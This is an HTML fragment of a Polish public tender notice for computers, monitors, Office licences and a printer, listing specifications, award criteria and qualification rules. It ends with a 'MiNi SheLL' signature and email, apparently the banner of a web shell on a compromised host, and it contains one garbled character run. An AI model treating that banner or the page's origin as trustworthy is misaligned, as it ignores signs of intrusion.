2.4 GHz (USB nano odbiornik)<br/> Zasięg działania min. 10 metrów<br/> Rodzaj sensora Optyczny<br/> Rozdzielczość sensora min. 1000 DPI<br/> Liczba przycisków Min. 3<br/> Kółko przewijania z funkcją przycisku środkowego<br/> Zasilanie 1x bateria AA lub AAA<br/> Kompatybilność Windows 11, Linux, macOS<br/> Ergonomia Obudowa profilowana do pracy prawą ręką lub uniwersalna<br/> Wymiary Maks. 110 x 65 x 40 mm<br/> Waga Maks. 90 g z baterią<br/> Kolor Czarny, szary lub grafitowy (nie jaskrawy)<br/> Funkcje dodatkowe:<br/> • Funkcja oszczędzania energii (auto sleep mode)<br/> • Plug &amp; Play – brak konieczności instalacji sterowników<br/> • Możliwość przechowywania odbiornika USB w obudowie myszy<br/>Wymagania jakościowe i formalne:<br/> • Produkt fabrycznie nowy<br/> • Gwarancja producenta min. 12 miesięcy<br/> • Oznaczenie CE<br/> • Instrukcja w języku polskim (papierowa lub elektroniczna)<br/> • Zgodność z RoHS<br/> 4. Licencja na pakiet biurowy MS OFFICE 2024 PL BOX 2 SZTUKI o parametrach<br/> brak ograniczeń czasowych okresu użytkowania (lub równoważny: zapewniający pełną możliwość odczytu<br/> i edycji dokumentów utworzonych w aplikacjach wchodzących w skład pakietu MS Office 2003 bez utraty<br/> jakichkolwiek parametrów tych dokumentów współpracujący z oprogramowaniem używanym przez<br/> Zamawiającego m.in. szablonami opartymi na języku makropoleceń, systemem obiegu dokumentów).<br/> Pakiet powinien zawierać co najmniej: edytor tekstu, arkusz kalkulacyjny, program do tworzenia prezentacji,<br/> program do obsługi poczty elektronicznej, charakteryzujący się następującymi cechami: <br/>• pełna polska wersja językowa interfejsu użytkownika, dokumentacja oraz pomoc techniczna w języku<br/> polskim,<br/> • możliwość blokowania niebezpiecznej lub niechcianej poczty,<br/> • prawidłowe odczytywanie i zapisywanie danych w dokumentach w formatach: DOC, .DOCX, XLS, .XLSX,<br/> w tym obsługa formatowania, makr, formuł, formularzy w plikach wytworzonych w MS Office 2007, MS Office<br/> 2010<br/> • zaproponowane oprogramowanie musi posiadać taki sposób licencjonowania, który zapewni jego instalację<br/> na komputerze (komputerach) innych niż te, na których pierwotnie zainstalowano oprogramowanie,<br/> pod warunkiem wcześniejszej deinstalacji z tego komputera (komputerów).<br/> • możliwość instalacji na systemach operacyjnych Microsoft Windows: 10,11<br/> zachowanie pełnej zgodności z formatami plików utworzonych za pomocą oprogramowania Microsoft Excel,<br/> Word, Power Point w wersji 2003 oraz 2007 i 2010, z uwzględnieniem poprawnej realizacji użytych w nich<br/> funkcji specjalnych i makropoleceń.<br/> • zamawiane oprogramowanie musi być wersją wydaną w 2024 roku, zapewniającą pełne wsparcie techniczne<br/> na kolejne lata </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <p class="mb-0">30237410-6 - Myszka komputerowa</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryteriów oceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Komputer stacjonarny 60 SZTUK o parametrach:- procesor, min. 19000 pkt (wynik zaproponowanego procesora musi znajdować się na stronie<br/> http://www.cpubenchmark.net). Na dzień 05.06.2025- pamięć: min. RAM DDR4 16 GB, - dysk SSD min. 450 GB, - Karta graficzna: Zintegrowana- wbudowane wejście LAN 10/100/1000 Mbps, - wbudowany moduł Wi-Fi 802.11 n/ac, moduł Bluetooth, - wyjścia wideo: Min. 1x HDMI, 1x DisplayPort- wbudowany moduł TPM 2.0 (Trusted Platform Module)- porty USB (przód): Min. 1x USB 3.2 Gen 1, 1x USB 2.0- porty USB (tył): Min. 2x USB 3.2 Gen 1, 2x USB 2.0- zasilacz: Min. 260 W lub wyższy, z certyfikatem 80 PLUS- wymiary maksymalne wys. 350 mm, szer. 200 mm, głęb. 350mm- klawiatura i mysz w zestawie- zainstalowany system operacyjny System operacyjny Microsoft Windows 11 Pro PL 64-bit <br/>Język Polska wersja językowa (PL)<br/> Architektura 64-bitowa<br/> Typ licencji Licencja wieczysta, elektroniczna lub OEM/FPP<br/> Możliwość aktywacji Online i telefonicznie<br/> Obsługiwane procesory 64-bitowe procesory z min. 1 GHz, 2 rdzenie, zgodne z listą obsługiwanych CPU<br/> Windows 11<br/> Pamięć RAM Min. 4 GB<br/> Karta graficzna Zgodna z DirectX 12 / WDDM 2.0<br/> TPM Wersja 2.0<br/>Interfejs użytkownika Graficzny, z obsługą dotyku, myszy i klawiatury<br/> Tryby pracy Obsługa trybu pulpitu zdalnego, wirtualizacji, domeny AD, BitLocker, Hyper-V<br/> Aktualizacje Automatyczne aktualizacje bezpieczeństwa i funkcji<br/> Zgodność Pełna kompatybilność z urządzeniami i oprogramowaniem dla Windows 11 Pro<br/> Wsparcie Aktualizacje i wsparcie techniczne producenta<br/> Funkcje wymagane:<br/> Obsługa szyfrowania BitLoď¿½ system operacyjny równoważny, pod warunkiem zapewnienia identycznej lub<br/> wyższej funkcjonalności oraz pełnej kompatybilności z oprogramowaniem działającym na Windows 11 Pro.<br/> W przypadku zaoferowania systemu równoważnego Wykonawca zobowiązany jest do dostarczenia jego<br/> dokumentacji technicznej potwierdzającej zgodność.- Gwarancja: Minimum 3 lata<br/> Wymagania dodatkowe:<br/> • Komputer musi być fabrycznie nowy, nieużywany, wyprodukowany nie wcześniej niż 6 miesięcy przed datą<br/> dostawy.<br/> • Musi posiadać certyfikat kompatybilności z Windows 11 Professional.<br/> • Powinien być dostarczony z kompletem sterowników oraz dokumentacją użytkownika.<br/> Minimalne wymagania techniczne dotyczące monitora:<br/> Przekątna ekranu: min. 23,8 cala (60,5 cm)<br/> Typ matrycy: IPS (In-Plane Switching)<br/> Rozdzielczość: Full HD 1920 x 1080 pikseli<br/> Częstotliwość odświeżania: min. 100 Hz<br/> Czas reakcji: 1 ms (MPRT)<br/> Format obrazu: 16:9<br/> Jasność: min. 250 cd/m²<br/> Kontrast statyczny: min. 1000:1<br/> Kąty widzenia: 178° (pion) / 178° (poziom)<br/> Złącza wideo: min. 1x HDMI, 1x VGA (D-Sub)<br/> Wbudowane głośniki<br/> Zasilacz oraz przewód HDMI w zestawie<br/> Funkcje dodatkowe:<br/> • redukcja emisji niebieskiego światła<br/> • technologia eliminująca migotanie obrazu<br/> • Możliwość montażu na uchwycie<br/> Monitor musi być objęty gwarancją producenta minimum 24 miesiące<br/> 3. Licencja na pakiet biurowy MS OFFICE 2024 PL BOX lub ESD 69 SZTUK o parametrach:<br/> brak ograniczeń czasowych okresu użytkowania (lub równoważny: zapewniający pełną możliwość odczytu<br/> i edycji dokumentów utworzonych w aplikacjach wchodzących w skład pakietu MS Office 2003 bez utraty<br/> jakichkolwiek parametrów tych dokumentów współpracujący z oprogramowaniem używanym przez<br/> Zamawiającego m.in. szablonami opartymi na języku makropoleceń, systemem obiegu dokumentów).<br/> Pakiet powinien zawierać co najmniej: edytor tekstu, arkusz kalkulacyjny, program do tworzenia prezentacji,<br/> program do obsługi poczty elektronicznej, charakteryzujący się następującymi cechami: <br/>• pełna polska wersja językowa interfejsu użytkownika, dokumentacja oraz pomoc techniczna w języku<br/> polskim,<br/> • możliwość blokowania niebezpiecznej lub niechcianej poczty,<br/> • prawidłowe odczytywanie i zapisywanie danych w dokumentach w formatach: DOC, .DOCX, XLS, .XLSX,<br/> w tym obsługa formatowania, makr, formuł, formularzy w plikach wytworzonych w MS Office 2007, MS Office<br/> 2010<br/> • zaproponowane oprogramowanie musi posiadać taki sposób licencjonowania, który zapewni jego instalację<br/> na komputerze (komputerach) innych niż te, na których pierwotnie zainstalowano oprogramowanie,<br/> pod warunkiem wcześniejszej deinstalacji z tego komputera (komputerów).<br/> • możliwość instalacji na systemach operacyjnych Microsoft Windows: 10,11<br/> zachowanie pełnej zgodności z formatami plików utworzonych za pomocą oprogramowania Microsoft Excel,<br/> Word, Power Point w wersji 2003 oraz 2007 i 2010, z uwzględnieniem poprawnej realizacji użytych w nich<br/> funkcji specjalnych i makropoleceń.<br/> • zamawiane oprogramowanie musi być wersją wydaną w 2024 roku, zapewniającą pełne wsparcie techniczne<br/> na kolejne lata.<br/>4. Urządzenie wielofunkcyjne laserowe kolorowe A4 1 SZTUKA o parametrach:<br/> Typ druku Laserowy, kolorowy<br/> Format papieru A4<br/> Prędkość druku min. 33 str./min w kolorze i czerni<br/> Rozdzielczość druku min. 1200 x 1200 dpi<br/> Automatyczny dupleks Tak (druk dwustronny)<br/> Automatyczne podajnik dokumentów (ADF) zapewniający jednoprzebiegowe kolorowe skanowanie<br/> Pojemność podajników papieru min. 600 arkuszy (z możliwością rozbudowy do 1600)<br/> Pojemność tacy odbiorczej min. 250 arkuszy<br/> Obsługa gramatury papieru 60–210 g/m²<br/> Interfejsy USB 2.0, Ethernet 10/100/1000 Base-T, możliwość drukowania mobilnego (AirPrint, Mopria, itp.)<br/> Pamięć RAM min. 4 GB<br/> Dysk twardy min. 16 GB SSD<br/> Ekran dotykowy Kolorowy, min. 7 cali<br/> Funkcje bezpieczeństwa Szyfrowanie danych, uwierzytelnianie użytkowników, bezpieczne drukowanie<br/> Systemy operacyjne Kompatybilność z Windows 10/11, macOS, Linux<br/> Wymiary max. 420 x 528 x 572 mm<br/> Waga max. 38,4 kg<br/> Certyfikaty CE, Energy Star lub równoważne<br/> Wymagania dodatkowe:<br/> • Sterowniki dostępne do pobrania ze strony producenta<br/> • Urządzenie fabrycznie nowe<br/> • Gwarancja min. 24 miesiące<br/> • Możliwość serwisowania na terenie Polski<br/> 5. Zestaw tonerów do urządzania z poz. 4- JEDEN KOMPLET </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213300-8 - Komputer biurkowy</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">30232150-0 - Drukarki atramentowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryteriów oceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym<br/>Określenie warunku:<br/> Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/> 2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/> odrębnych przepisów<br/> Określenie warunku:<br/> Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/> 3. Sytuacja finansowa lub ekonomiczna<br/> Określenie warunku:<br/> O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli<br/> na prawidłowe wykonanie zadania.<br/> 4. Zdolność techniczna lub zawodowa<br/> Określenie warunku:<br/> O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe<br/> wykonanie zadania.<br/> O zamówienie mogą ubiegać się wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie<br/> zadania<br/> Zamawiający nie określa szczegółowego warunku dotyczącego osób zdolnych do wykonania zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dokumenty składane wraz z ofertą:<br/> • oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu o treści ZAŁĄCZNIKA NR 2 do<br/> SWZ,<br/> Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/> oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/> wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w<br/> jakim wykonawca powołuje się na jego zasoby.<br/> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie<br/> ubiegających się o zamówienie (np. konsorcjum, wspólnicy spółki cywilnej). Dokumenty te potwierdzają spełnianie warunków udziału<br/> w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje<br/> spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia.<br/> • zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/> danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie<br/> dysponował niezbędnymi zasobami tych podmiotów. Wykonawca może w celu potwierdzenia spełniania warunków udziału w<br/> postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części,<br/> polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających<br/> zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Zobowiązanie podmiotu udostępniającego<br/> zasoby, potwierdza, ze stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/> zasobów. Przykładowy wzór zobowiązania podmiotu udostępniającego zasoby stanowi ZAŁĄCZNIK NR 9 do SWZ.<br/><br/>NA WEZWANIE ZAMAWIAJĄCEGO:<br/> • odpis lub informacja z Krajowego Rejestru Sadowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/> zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/> wymagają wpisu do rejestru lub ewidencji. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/> Rzeczypospolitej Polskiej, zamiast powyższego dokumentu składa dokument lub dokumenty wystawione w kraju, w którym<br/> wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, ze nie otwarto jego likwidacji, nie ogłoszono upadłości, jego<br/> aktywami nie zarządza likwidator lub sad, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani<br/> nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/> procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/> • oświadczenie wykonawcy, w zakresie art. 108 ust 1 pkt 5 ustawy pzp, o braku przynależności do tej samej grupy kapitałowej o<br/> treści ZAŁĄCZNIKA NR 5 do SWZ w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym<br/> wykonawca, który złożył odrębną ofertę, ofertę częściowa lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/> oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/> przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/> należącego do tej samej grupy kapitałowej<br/> •oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy pzp o treści<br/> ZAŁĄCZNIKA NR 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokumenty składane wraz z ofertą:<br/> • oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu o treści ZAŁĄCZNIKA NR 2 do<br/> SWZ,<br/> Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/> oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/> wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w<br/> jakim wykonawca powołuje się na jego zasoby.<br/> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie<br/> ubiegających się o zamówienie (np. konsorcjum, wspólnicy spółki cywilnej). Dokumenty te potwierdzają spełnianie warunków udziału<br/> w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje<br/> spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia.<br/> • zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/> danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie<br/> dysponował niezbędnymi zasobami tych podmiotów. Wykonawca może w celu potwierdzenia spełniania warunków udziału w<br/> postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części,<br/> polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających<br/> zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Zobowiązanie podmiotu udostępniającego<br/> zasoby, potwierdza, ze stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/> zasobów. Przykładowy wzór zobowiązania podmiotu udostępniającego zasoby stanowi ZAŁĄCZNIK NR 9 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie<br/> ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/> budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający<br/> się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty<br/> oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 455 ustawy Prawo zamówień publicznych. Warunki dot. zmiany umowy opisane są w załączniku nr 7 do SWZ- Wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com